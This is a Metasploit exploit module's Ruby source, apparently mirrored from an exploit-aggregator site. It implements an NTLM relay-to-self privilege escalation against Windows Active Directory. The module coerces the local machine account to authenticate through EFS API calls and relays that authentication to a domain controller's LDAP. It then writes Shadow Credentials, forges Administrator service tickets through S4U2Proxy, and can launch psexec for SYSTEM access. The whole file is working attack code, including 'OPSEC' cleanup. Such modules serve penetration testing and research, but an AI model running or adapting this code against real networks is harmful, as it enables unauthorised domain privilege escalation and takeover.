Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-WINDOWS-LOCAL-NTLM_RELAY_2_SELF-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  include Msf::Exploit::Remote::HttpServer::Relay
  include Msf::Exploit::Remote::LDAP::ActiveDirectory
  include Msf::Post::Windows::Priv
  include Msf::Post::File

  attr_accessor :service

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NTLM Relay to Self (HTTP to LDAP) - Post Exploitation',
        'Description' => %q{
          This module performs an NTLM relay-to-self privilege escalation attack. It starts an HTTP-to-LDAP
          relay server on the compromised host, then triggers the WebClient service via an ETW event
          (allowing a low-privilege user to start it), and coerces the local machine account to authenticate
          via OpenEncryptedFileRaw to the relay listener over WebDAV.

          The coerced machine account NTLM authentication is relayed to a Domain Controller's LDAP service,
          where the module writes Shadow Credentials (msDS-KeyCredentialLink) to its own AD object and
          obtains a Kerberos TGT via PKINIT. The module then performs S4U2Proxy to obtain an impersonating
          service ticket for Administrator, enabling psexec back to itself for SYSTEM access.

          RUN_GET_TICKET and RUN_PSEXEC are independent toggles. An operator can obtain a ticket without running
          psexec, run psexec with a previously obtained ticket, or run both sequentially. RUN_PSEXEC defaults to
          false so the module does not automatically attempt lateral movement.
        },
        'License' => MSF_LICENSE,
        'Stance' => Msf::Exploit::Stance::Passive,
        'Passive' => true,
        'Author' => [ 'jheysel-r7' ],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [ 'Windows', {} ]
        ],
        'DisclosureDate' => '2001-01-01', # First record of NTLM Relaying
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )

    register_options([
      OptPort.new('SRVPORT', [true, 'The port the victim machine will listen on', 8081]),
      OptAddress.new('SRVHOST', [true, 'The interface the victim will listen on', '0.0.0.0']),
      OptPort.new('RPORT', [true, 'The target LDAP server port', 389]),
      OptString.new('TARGETURI', [true, 'The target URI to relay', '/']),
      OptString.new('DOMAIN', [false, 'The target domain (auto-detected from session if blank)', '']),
      OptBool.new('RANDOMIZE_TARGETS', [false, 'Randomize relay targets', false]),
      OptInt.new('SessionKeepalive', [false, 'Keepalive interval in seconds', 300]),
      OptBool.new('RUN_CHECKS', [true, 'Run pre-flight checks before starting the relay server', true]),
      OptBool.new('RUN_GET_TICKET', [
        true,
        'Write key credential (Shadow Credentials) and obtain a Kerberos TGT/ST for the target object.', true
      ]),
      OptBool.new('RUN_PSEXEC', [
        true,
        'Use the obtained ticket to run psexec against the target host for a session. Only meaningful for computer targets.', false
      ]),
      OptString.new('TARGET_PRIVILEGED_USER', [true, 'The privileged user to attempt to impersonate and authenticate as', 'Administrator']),
      OptString.new('SPN', [false, 'Service Principal Name for the TGS request (default: CIFS/<target_fqdn>)', '']),
      OptInt.new('COERCE_AUTH_WAIT', [true, 'Time to wait to try a different EFS Win32 API via railgun after the first wasn\'t successful', 3]),
    ])

    # The module passes the payload definition to the psexec module which will start the handler
    register_advanced_options([
      OptBool.new('DisablePayloadHandler', [false, 'Disable the handler', true])
    ])

    # These are loaded in from the ActiveDirectory mixin which the module will only use with the session returned from
    # the LDAP relay, deregister as they're unnecessary
    deregister_options('LDAPDomain', 'LDAPPassword', 'LDAPUsername')
  end

  def relay_targets
    Msf::Exploit::Remote::Relay::TargetList.new(
      :ldap,
      datastore['RPORT'],
      datastore['RHOSTS'],
      datastore['TARGETURI'],
      randomize_targets: datastore['RANDOMIZE_TARGETS'],
      drop_mic_only: false,
      drop_mic_and_sign_key_exch_flags: true
    )
  end

  def lm_compatibility_level
    registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa', 'LmCompatibilityLevel')
  end

  # Auto-detects the victim's machine account name (e.g., desktop-123$)
  def default_machine_account
    computer_name = session.sys.config.sysinfo['Computer']
    "#{computer_name}$".downcase
  end

  # Resolves the target domain from the datastore or auto-detects from the session.
  def resolve_domain
    domain = datastore['DOMAIN'].to_s.strip
    return domain unless domain.empty? || domain == '/'

    detected = get_domain_name
    if detected.to_s.empty?
      print_error('Could not auto-detect domain. Please set the DOMAIN option manually.')
      return nil
    end
    print_status("Auto-detected domain: #{detected}")
    detected
  end

  # Derives the FQDN for the target computer object.
  def target_fqdn(target_name, domain_fqdn)
    hostname = target_name.delete_suffix('$')
    "#{hostname}.#{domain_fqdn}".downcase
  end

  # Validates options early and fails fast on invalid configurations.
  def validate_options!
    unless datastore['RUN_GET_TICKET'] || datastore['RUN_PSEXEC']
      print_status('Neither RUN_GET_TICKET nor RUN_PSEXEC is set. The module will only perform the relay.')
      return false
    end

    true
  end

  def exploit
    unless session.type == 'meterpreter'
      fail_with(Failure::BadConfig, "This module requires a Meterpreter session (got: #{session.type}).")
    end

    @spawned_ldap_sessions = []

    pre_flight_checks if datastore['RUN_CHECKS']

    print_status("Starting relay server bound to Session #{session.sid}...")
    start_service({ 'Comm' => session })
    print_status("Server successfully started on #{srvhost}:#{datastore['SRVPORT']} via Session #{session.sid}.")

    print_status('Starting WebClient service via ETW trigger...')
    start_webclient_service

    print_status('Coercing machine account authentication via PetitPotam (EfsRpc) to relay listener...')
    coerce_authentication

    @http_relay_service.wait if @http_relay_service
  end

  # Starts the WebClient service by attempting a connection to a WebDAV resource via WNetAddConnection2.
  # This triggers the MPR -> davclnt.dll -> TriggerStartWebClientService code path internally,
  # which fires the ETW event from the local process context (with LOCAL SID in the token).
  # The connection itself will fail, but the side effect of loading davclnt.dll starts the service.
  # Starts the WebClient service using an ETW event trigger via railgun.
  # Registering an ETW provider with the WebClient service trigger GUID and writing
  # an event causes the service to auto-start (works from medium integrity with LOCAL SID).
  def start_webclient_service
    check_local_sid
    # GUID: {22B6D684-FA63-4578-87C9-EFFCBE6643C7}
    guid = [0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7].pack('VvvC8')

    railgun = session.railgun
    railgun.add_function('advapi32', 'EventRegister', 'DWORD', [
      ['PBLOB', 'ProviderId', 'in'],
      ['PBLOB', 'EnableCallback', 'in'],
      ['PBLOB', 'CallbackContext', 'in'],
      ['PBLOB', 'RegHandle', 'out']
    ])

    if session.arch == ARCH_X64
      railgun.add_function('advapi32', 'EventWrite', 'DWORD', [
        ['LPVOID', 'RegHandle', 'in'],
        ['PBLOB', 'EventDescriptor', 'in'],
        ['DWORD', 'UserDataCount', 'in'],
        ['PBLOB', 'UserData', 'in']
      ])
      railgun.add_function('advapi32', 'EventUnregister', 'DWORD', [
        ['LPVOID', 'RegHandle', 'in']
      ])
    else
      # x86 stdcall: ULONGLONG is passed as   DWORDs on the stack (low first, high second)
      railgun.add_function('advapi32', 'EventWrite', 'DWORD', [
        ['DWORD', 'RegHandleLow', 'in'],
        ['DWORD', 'RegHandleHigh', 'in'],
        ['PBLOB', 'EventDescriptor', 'in'],
        ['DWORD', 'UserDataCount', 'in'],
        ['PBLOB', 'UserData', 'in']
      ])
      railgun.add_function('advapi32', 'EventUnregister', 'DWORD', [
        ['DWORD', 'RegHandleLow', 'in'],
        ['DWORD', 'RegHandleHigh', 'in']
      ])
    end

    result = railgun.advapi32.EventRegister(guid, nil, nil, 8)
    unless result['return'] == 0
      fail_with(Failure::Unknown, "EventRegister failed with error code: #{result['return']}")
    end

    reg_handle_raw = result['RegHandle']

    # EVENT_DESCRIPTOR struct layout:
    # Id(USHORT=2), Version(UCHAR=1), Channel(UCHAR=1), Level(UCHAR=1), Opcode(UCHAR=1), Task(USHORT=2), Keyword(ULONGLONG=8)
    # Values: Id=1, Version=0, Channel=0, Level=4, Opcode=0, Task=0, Keyword=0
    event_desc = [1, 0, 0, 4, 0, 0, 0].pack('vCCCCvQ<')

    if session.arch == ARCH_X64
      reg_handle = reg_handle_raw.unpack1('Q<')
      result = railgun.advapi32.EventWrite(reg_handle, event_desc, 0, nil)
      unless result['return'] == 0
        railgun.advapi32.EventUnregister(reg_handle)
        fail_with(Failure::Unknown, "EventWrite failed with error code: #{result['return']}")
      end
      railgun.advapi32.EventUnregister(reg_handle)
    else
      handle_low, handle_high = reg_handle_raw.unpack('VV')
      result = railgun.advapi32.EventWrite(handle_low, handle_high, event_desc, 0, nil)
      unless result['return'] == 0
        railgun.advapi32.EventUnregister(handle_low, handle_high)
        fail_with(Failure::Unknown, "EventWrite failed with error code: #{result['return']}")
      end
      railgun.advapi32.EventUnregister(handle_low, handle_high)
    end
    print_good('WebClient service triggered successfully via ETW.')

    # Give the service a moment to start
    Rex.sleep(3)
  end

  # Coerces machine account authentication by calling EFS Win32 APIs via railgun
  # with a WebDAV UNC path, triggering the machine account to authenticate to our relay listener.
  # Tries multiple methods until one succeeds, similar to PetitPotam's Automatic mode.
  def coerce_authentication
    hostname = session.sys.config.sysinfo['Computer']
    listener = "#{hostname}@#{datastore['SRVPORT']}/print"
    @relay_succeeded = false

    efs_methods = [
      { name: 'OpenEncryptedFileRaw', call: ->(path) { session.railgun.advapi32.OpenEncryptedFileRawW(path, 0, 8) } },
      { name: 'EncryptFile', call: ->(path) { session.railgun.advapi32.EncryptFileW(path) } },
      { name: 'DecryptFile', call: ->(path) { session.railgun.advapi32.DecryptFileW(path, 0) } }
    ]

    efs_methods.each do |method|
      break if @relay_succeeded

      rand_path = "#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.#{Rex::Text.rand_text_alphanumeric(3)}"
      unc_path = "\\\\#{listener}\\#{rand_path}"

      print_status("Attempting coercion via #{method[:name]} on #{unc_path}...")
      method[:call].call(unc_path)

      # Give the relay a moment to process before trying the next method
      Rex.sleep(datastore['COERCE_AUTH_WAIT'])
    end
  end

  def on_relay_success(relay_connection:, relay_identity:)
    @relay_succeeded = true
    print_good('Relay succeeded! Handshake completed.')

    ldap_session = session_setup(relay_connection, relay_identity)
    return unless ldap_session

    return unless validate_options!

    dc_ip = relay_connection.socket.peerhost
    target_name = default_machine_account

    framework.threads.spawn("Post_Relay_Chain_#{ldap_session.sid}", false) do
      run_post_relay_chain(ldap_session, dc_ip, target_name)
    end
  rescue StandardError => e
    elog('Failed to setup the session or orchestrate post-relay actions', error: e)
    print_error("Relay success handling failed: #{e.message}")
  end

  def run_post_relay_chain(ldap_session, dc_ip, target_name)
    if datastore['RUN_GET_TICKET']
      run_get_ticket_chain(ldap_session, dc_ip, target_name)
    end

    if datastore['RUN_PSEXEC']
      run_psexec_step(ldap_session, dc_ip, target_name)
    end
  end

  def run_get_ticket_chain(ldap_session, dc_ip, target_name)
    added_device_id = nil

    begin
      domain_fqdn = resolve_domain
      return unless domain_fqdn

      fqdn = target_fqdn(target_name, domain_fqdn)

      shadow_results = call_shadow_credentials_module('ADD', ldap_session.sid, target_name)
      return unless shadow_results

      added_device_id = shadow_results[:device_id]
      cert_path = shadow_results[:cert_path]

      ccache_path = call_get_ticket_module('GET_TGS', cert_path, dc_ip, domain_fqdn, target_name, fqdn: fqdn)
      return unless ccache_path

      print_good("Obtained impersonating ST for target host #{target_name}")

      store_or_export_ticket(ccache_path, target_name)
    rescue StandardError => e
      print_error("Error during ticket acquisition chain: #{e.message}")
    ensure
      print_status('--- Initiating OPSEC Cleanup ---')

      if added_device_id
        print_status("Removing Shadow Credentials (Device ID: #{added_device_id})...")
        call_shadow_credentials_module('REMOVE', ldap_session.sid, target_name, added_device_id)
      end

      print_status('Cleanup complete.')
    end
  end

  def run_psexec_step(_ldap_session, _dc_ip, target_name)
    unless datastore['RUN_GET_TICKET']
      print_warning('RUN_PSEXEC set without RUN_GET_TICKET; expecting a previously obtained ticket.')
    end

    domain_fqdn = resolve_domain
    return unless domain_fqdn

    fqdn = target_fqdn(target_name, domain_fqdn)

    ccache_path = find_latest_ticket(target_name, domain_fqdn)
    unless ccache_path
      print_error("No cached ticket found for #{target_name}. Run with RUN_GET_TICKET first.")
      return
    end

    execute_psexec(ccache_path, fqdn, domain_fqdn)
  end

  def store_or_export_ticket(ccache_path, target_name)
    @last_ccache_path = ccache_path
    print_status("Ticket for #{target_name} stored at: #{ccache_path}")
  end

  def find_latest_ticket(target_name, domain_fqdn)
    return @last_ccache_path if @last_ccache_path && File.exist?(@last_ccache_path)

    fqdn = target_fqdn(target_name, domain_fqdn)
    ticket_loot = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").where('info LIKE ?', "%#{fqdn}%").last
    return ticket_loot.path if ticket_loot && File.exist?(ticket_loot.path)

    nil
  end

  def call_shadow_credentials_module(action, ldap_session_id, target_name, device_id = nil)
    mod_refname = 'admin/ldap/shadow_credentials'
    print_status("Loading #{mod_refname} to execute against LDAP Session #{ldap_session_id}")

    shadow_module = framework.modules.create(mod_refname)

    unless shadow_module
      print_error("Failed to load module: #{mod_refname}")
      return nil
    end

    shadow_module.datastore['SESSION'] = ldap_session_id
    shadow_module.datastore['ACTION'] = action
    shadow_module.datastore['TARGET_USER'] = target_name
    shadow_module.datastore['DEVICE_ID'] = device_id if action == 'REMOVE' && device_id
    shadow_module.datastore['VERBOSE'] = datastore['VERBOSE']

    print_status("Running #{mod_refname} to #{action} key for #{target_name}...")

    results = shadow_module.run_simple(
      'LocalInput' => user_input,
      'LocalOutput' => user_output,
      'RunAsJob' => false
    )

    if action == 'ADD'
      if results && results.is_a?(Array) && results.length >= 2
        returned_device_id, stored_path = results
        print_status("Shadow Credentials successfully added (Device ID: #{returned_device_id}).")
        return { device_id: returned_device_id, cert_path: stored_path }
      end
    elsif action == 'REMOVE'
      if results
        print_good("Successfully removed KeyCredentialLink with Device ID: #{device_id}")
        return { success: true }
      end
    end

    print_error("Shadow credentials module failed or did not return expected data for action #{action}.")
    nil
  end

  # Obtains a Kerberos ticket via the get_ticket module.
  # action: 'GET_TGT' (user targets) or 'GET_TGS' (computer targets with S4U2Proxy impersonation).
  def call_get_ticket_module(action, cert_path, dc_ip, domain_fqdn, target_name, fqdn: nil)
    is_tgs = action == 'GET_TGS'
    print_status(is_tgs ? 'Requesting S4U2Proxy TGS for Administrator...' : "Requesting TGT for user #{target_name} via PKINIT...")

    get_ticket_mod = framework.modules.create('auxiliary/admin/kerberos/get_ticket')
    initial_loot_id = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").maximum(:id) || 0

    get_ticket_mod.datastore['ACTION'] = action
    get_ticket_mod.datastore['CERT_FILE'] = cert_path
    get_ticket_mod.datastore['DOMAIN'] = domain_fqdn
    get_ticket_mod.datastore['RHOSTS'] = dc_ip
    get_ticket_mod.datastore['USERNAME'] = target_name

    if is_tgs
      get_ticket_mod.datastore['IMPERSONATE'] = datastore['TARGET_PRIVILEGED_USER'].to_s.empty? ? 'Administrator' : datastore['TARGET_PRIVILEGED_USER']
      get_ticket_mod.datastore['IMPERSONATE_TYPE'] = 'generic'
      get_ticket_mod.datastore['SPN'] = datastore['SPN'].to_s.empty? ? "CIFS/#{fqdn}" : datastore['SPN']
    end

    vprint_status('Datastore values being sent to get_ticket:')
    vprint_status("ACTION: #{get_ticket_mod.datastore['ACTION']}")
    vprint_status("CERT_FILE: #{get_ticket_mod.datastore['CERT_FILE']}")
    vprint_status("DOMAIN: #{get_ticket_mod.datastore['DOMAIN']}")
    vprint_status("RHOSTS: #{get_ticket_mod.datastore['RHOSTS']}")
    vprint_status("USERNAME: #{get_ticket_mod.datastore['USERNAME']}")
    vprint_status("IMPERSONATE: #{get_ticket_mod.datastore['IMPERSONATE']}")
    vprint_status("IMPERSONATE_TYPE: #{get_ticket_mod.datastore['IMPERSONATE_TYPE']}")
    vprint_status("SPN: #{get_ticket_mod.datastore['SPN']}")

    begin
      get_ticket_mod.run_simple('LocalInput' => user_input, 'LocalOutput' => user_output)
    rescue StandardError => e
      print_error("Getting the #{is_tgs ? 'TGS' : 'TGT'} has failed: #{e.message}.")
      return nil
    end

    ticket_loot = framework.db.loots.where("ltype LIKE '%kerberos.ccache%'").where('id > ?', initial_loot_id).last

    unless ticket_loot && File.exist?(ticket_loot.path)
      print_error("Failed to retrieve #{is_tgs ? 'TGS' : 'TGT'} from database.")
      return nil
    end

    print_good("#{is_tgs ? 'S4U2Proxy Ticket' : 'TGT'} acquired: #{ticket_loot.path}")
    ticket_loot.path
  end

  def execute_psexec(ccache_path, fqdn, domain_fqdn)
    print_status("Executing PsExec with Kerberos ticket via session #{session.sid} COMM channel...")

    psexec_mod = framework.modules.create('exploit/windows/smb/psexec')
    unless psexec_mod
      print_error('Failed to load module: exploit/windows/smb/psexec')
      return
    end

    psexec_mod.datastore['RHOSTS'] = fqdn
    psexec_mod.datastore['SMBUser'] = 'Administrator'
    psexec_mod.datastore['SMBDomain'] = domain_fqdn
    psexec_mod.datastore['SMB::Auth'] = 'kerberos'
    psexec_mod.datastore['Smb::Krb5Ccname'] = ccache_path
    psexec_mod.datastore['Smb::Rhostname'] = fqdn
    psexec_mod.datastore['SMB::Comm'] = session.sid
    psexec_mod.datastore['PAYLOAD'] = payload_instance.refname
    psexec_mod.datastore['LHOST'] = datastore['LHOST'] if datastore['LHOST']
    psexec_mod.datastore['LPORT'] = datastore['LPORT'] if datastore['LPORT']

    print_status("Launching PsExec against #{fqdn} as Administrator (Kerberos) via COMM session #{session.sid}...")

    psexec_mod.exploit_simple(
      'LocalInput' => user_input,
      'LocalOutput' => user_output,
      'RunAsJob' => true
    )

    print_good('PsExec module launched. Check sessions for new elevated session.')
  end

  def session_setup(relay_connection, relay_identity)
    client = relay_connection.create_ldap_client
    ldap_session = Msf::Sessions::LDAP.new(
      relay_connection.socket,
      {
        client: client,
        keepalive_seconds: datastore['SessionKeepalive']
      }
    )
    domain, _, username = relay_identity.partition('\\')

    ldap_session.set_from_exploit(self)
    ldap_session.info = "#{domain}\\#{username}"
    framework.sessions.register(ldap_session)

    if ldap_session.sid
      print_good("LDAP Session #{ldap_session.sid} successfully opened!")
      @spawned_ldap_sessions << ldap_session.sid
      ldap_session
    else
      print_error('Failed to register the LDAP session.')
      nil
    end
  end

  def pre_flight_checks
    check_db_status
    check_options
    check_lm_compatibility_level
    check_privs
    check_port_availability
    check_target_reachability
  end

  def check_db_status
    unless framework.db.active
      fail_with(Failure::BadConfig, 'A connected Metasploit database is required to track Kerberos tickets. Please start the database using `db_connect`.')
    end
  end

  def check_options
    unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)
      fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')
    end
  end

  def check_lm_compatibility_level
    lm_level = lm_compatibility_level

    if lm_level > 2
      fail_with(Failure::BadConfig, 'The target system is configured to not send NTLMv1 responses. This module requires NTLMv1 to be enabled to capture relay credentials. Please set the LmCompatibilityLevel registry value to 2 or lower and try again.')
    end

    print_good("Target system LmCompatibilityLevel is set to #{lm_level}, which allows NTLMv1 responses. Proceeding with module execution.")
  end

  def check_privs
    srvport = datastore['SRVPORT'].to_i

    if srvport <= 1024 && !is_admin?
      print_warning("You are attempting to bind to a privileged port (#{srvport}) but do not have Admin rights.")
      print_warning('The OS will likely block this. Consider changing SRVPORT to something > 1024, or escalating privileges.')
    end
  end

  # Verifies the session token has the LOCAL SID (S-1-2-0). The ETW service trigger
  # for WebClient requires this SID. Present for interactive/RDP logons, absent for
  # network (type 3) logons such as psexec or WMI-spawned sessions.
  def check_local_sid
    # S-1-2-0 binary SID: Revision=1, SubAuthorityCount=1,
    # IdentifierAuthority={0,0,0,0,0,2}, SubAuthority[0]=0
    local_sid = "\x01\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"

    result = session.railgun.advapi32.CheckTokenMembership(0, local_sid, 4)
    is_member = result['IsMember'].unpack1('V')

    unless is_member != 0
      fail_with(Failure::BadConfig,
                'Session token does not have the LOCAL SID (S-1-2-0). ' \
                'The ETW trigger requires an interactive or RDP logon. ' \
                'Network logon sessions (e.g., psexec/WMI) will not work.')
    end
    print_good('Session token has LOCAL SID (S-1-2-0) โ€” ETW service trigger will work.')
  end

  def check_port_availability
    srvport = datastore['SRVPORT'].to_i
    print_status("Checking if port #{srvport} is available on the victim...")

    begin
      connections = session.net.config.get_netstat
      conflict = connections.find do |conn|
        conn.local_port == srvport &&
          conn.protocol == 'tcp' &&
          conn.state == 'LISTEN'
      end

      if conflict
        pid_info = conflict.pid_name.to_s.empty? ? conflict.pid : conflict.pid_name
        fail_with(Failure::BadConfig, "Port #{srvport} is already in use by PID #{pid_info} on the victim machine! Please choose a different SRVPORT.")
      else
        print_good("Port #{srvport} is available on the victim machine.")
      end
    rescue NoMethodError, Rex::Post::Meterpreter::RequestError => e
      print_warning("Could not verify port availability (Error: #{e.message}). Proceeding anyway...")
    end
  end

  def check_target_reachability
    rhosts_string = datastore['RHOSTS']
    rport = datastore['RPORT'].to_i

    print_status("Verifying victim can reach the target LDAP server(s) on port #{rport}...")

    Rex::Socket::RangeWalker.new(rhosts_string).each do |rhost|
      sock = session.net.socket.create(
        Rex::Socket::Parameters.new(
          'PeerHost' => rhost,
          'PeerPort' => rport,
          'Proto' => 'tcp'
        )
      )
      sock.close
      print_good("Target LDAP server #{rhost} is reachable from the victim!")
    rescue StandardError => e
      print_warning("Could not reach #{rhost}:#{rport} from the victim machine (Error: #{e.message}).")
      print_warning("The relay will likely fail for #{rhost} if the victim cannot communicate with it.")
    end
  end
end